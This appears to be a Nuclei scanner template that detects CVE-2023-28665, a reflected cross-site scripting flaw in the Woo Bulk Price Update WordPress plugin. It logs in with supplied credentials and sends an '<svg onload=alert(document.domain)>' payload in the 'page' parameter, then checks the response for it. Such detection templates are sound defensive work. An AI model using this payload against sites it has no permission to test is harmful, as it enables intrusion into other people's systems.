50 lines
1.9 KiB
YAML
50 lines
1.9 KiB
YAML
id: CVE-2023-28665
|
|
|
|
info:
|
|
name: Woo Bulk Price Update <2.2.2 - Cross-Site Scripting
|
|
author: Aaban SOlutions,harsh
|
|
severity: medium
|
|
description: |
|
|
The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.
|
|
remediation: Fixed in version 2.2.2
|
|
reference:
|
|
- https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-28665
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2023-28665
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00082
|
|
epss-percentile: 0.34161
|
|
cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: technocrackers
|
|
product: bulk_price_update_for_woocommerce
|
|
framework: wordpress
|
|
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(header_2, "text/html")'
|
|
- 'contains(body_2, "<svg onload=alert(document.domain)>")'
|
|
- 'contains(body_2, "pagination\":")'
|
|
condition: and
|
|
# digest: 4a0a0047304502204e7a9f5fc2cd8daa5001fc3fefc8d7c677c92855f7a2820ee79914aa9203fba5022100aebc9d4f7266aca872de0cfd0e118a31e2b1a6853cbfbf19e9dfc90252500a2a:922c64590222798bb761d5b6d8e72950 |